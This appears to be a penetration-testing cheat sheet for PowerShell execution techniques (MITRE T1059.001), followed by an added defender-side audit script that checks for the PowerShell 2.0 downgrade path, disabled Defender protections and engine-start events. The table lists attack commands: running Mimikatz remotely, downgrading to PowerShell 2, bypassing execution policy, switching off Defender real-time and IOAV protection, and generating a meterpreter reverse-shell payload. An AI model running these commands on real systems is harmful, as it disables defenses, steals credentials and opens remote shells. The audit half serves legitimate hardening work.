| Description | Command |
|---|---|
| MITRE ATT&CK, Execution, Technique T1059.001 | |
| Background: We can establish a persistent connection in PowerShell using Enter-PSSession. This can make life significantly easier and reduce overhead. | `New-PSSession -ComputerName [IP] -Credential [USER]` |
| | `Enter-PSSession -Session $#` |
| Background: We can execute scripts remotely with PowerShell. | `Invoke-Command -Session $# -FilePath C:\Users\Parzival\Desktop\Mimikatz.exe` |
| Background: This can be helpful when determining whether a PowerShell downgrade attack will work. | `(Get-ItemProperty HKLM:\SOFTWARE\Microsoft\PowerShell\*\PowerShellEngine -Name PowerShellVersion).PowerShellVersion` |
| This is important because, if the PowerShell 2.0 engine is installed, we can start the older engine and bypass multiple security protections that the more recent PowerShell 5 releases enable: | `powershell.exe -Version 2` |
| Information: Execution policy can be disabled in multiple ways; it is not a sufficient security control to prevent unsigned scripts from being loaded. | `powershell.exe -exec bypass` |
| | `Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process` |
| | `Powershell Set-MpPreference -DisableRealtimeMonitoring $true` |
| | `Powershell Set-MpPreference -DisableIOAVProtection $true` |
| | `msfvenom -p cmd/windows/powershell/meterpreter/reverse_tcp LHOST=$ip LPORT=$port` |
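The rows above read as an attacker's checklist; the same facts make a defender's audit. The following PowerShell is an added example written for this page, not a command from the original table or from any project it references. It reports whether the PowerShell 2.0 engine is registered on the host (the same `PowerShellEngine` registry query as above, tidied up), what the machine-wide execution policy is, whether Defender real-time or IOAV protection has been switched off, and whether the `Windows PowerShell` event log shows the v2 engine being started. The function names, the `-RemoveV2Engine` switch and the output property names are my own; the optional-feature name `MicrosoftWindowsPowerShellV2Root` and the event ID 400 engine-lifecycle record are real Windows identifiers that are not on the original page. Run it from an elevated session.

```powershell
# Added example (not from the original page): defender-side audit of the
# conditions the cheat sheet relies on. Assumes Windows 10/11 client SKU with
# the Defender and DISM cmdlets available; property and function names are mine.

function Get-PowerShellHardeningReport {
    [CmdletBinding()]
    param(
        # Optional remediation: disable the v2 engine feature if it is enabled.
        [switch]$RemoveV2Engine
    )

    # Engine versions registered under HKLM\...\PowerShell\<n>\PowerShellEngine.
    # The "1" key reports 2.0 when the legacy engine is present, the "3" key 5.x.
    $engines = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\PowerShell\*\PowerShellEngine' `
        -Name PowerShellVersion -ErrorAction SilentlyContinue |
        Select-Object -ExpandProperty PowerShellVersion

    # Optional-feature state for the v2 engine (client SKUs). Null where absent.
    $v2Feature = Get-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root `
        -ErrorAction SilentlyContinue

    if ($RemoveV2Engine -and $v2Feature -and $v2Feature.State -eq 'Enabled') {
        # Removes the downgrade path described in the table; no reboot is normally needed.
        Disable-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root -NoRestart | Out-Null
        $v2Feature = Get-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root
    }

    # Defender preferences: the two switches the table shows being set to $true.
    $mp = Get-MpPreference -ErrorAction SilentlyContinue

    [PSCustomObject]@{
        ComputerName               = $env:COMPUTERNAME
        RegisteredEngineVersions   = @($engines)
        V2EngineRegistered         = ($engines -contains '2.0')
        V2FeatureState             = if ($v2Feature) { [string]$v2Feature.State } else { 'NotPresent' }
        MachineExecutionPolicy     = [string](Get-ExecutionPolicy -Scope LocalMachine)
        RealtimeMonitoringDisabled = if ($mp) { [bool]$mp.DisableRealtimeMonitoring } else { $null }
        IOAVProtectionDisabled     = if ($mp) { [bool]$mp.DisableIOAVProtection } else { $null }
        V2EngineStartsInLog        = (Get-V2EngineStartEvent -MaxEvents 500).Count
    }
}

function Get-V2EngineStartEvent {
    [CmdletBinding()]
    param([int]$MaxEvents = 500)

    # Event ID 400 in the classic "Windows PowerShell" log is written whenever an
    # engine instance becomes Available; its message carries EngineVersion=<x>.
    # A 2.0 engine start on a host that normally runs 5.1 is the downgrade signal.
    Get-WinEvent -FilterHashtable @{ LogName = 'Windows PowerShell'; Id = 400 } `
        -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match 'EngineVersion=2\.0' } |
        Select-Object TimeCreated, Id, MachineName,
            @{ Name = 'HostApplication'; Expression = {
                if ($_.Message -match 'HostApplication=([^\r\n]+)') { $Matches[1] } else { '' } } }
}

# Usage: report only, or report and remove the legacy engine.
Get-PowerShellHardeningReport
# Get-PowerShellHardeningReport -RemoveV2Engine
```

The execution policy value is reported rather than judged because, as the table itself notes, it is not a security boundary; the fields worth alerting on are a registered 2.0 engine, either Defender switch reading `$true`, and any event 400 with `EngineVersion=2.0` on a host where 5.x is the default. On Server SKUs the equivalent removal is the `PowerShell-V2` Windows feature rather than the optional feature used here.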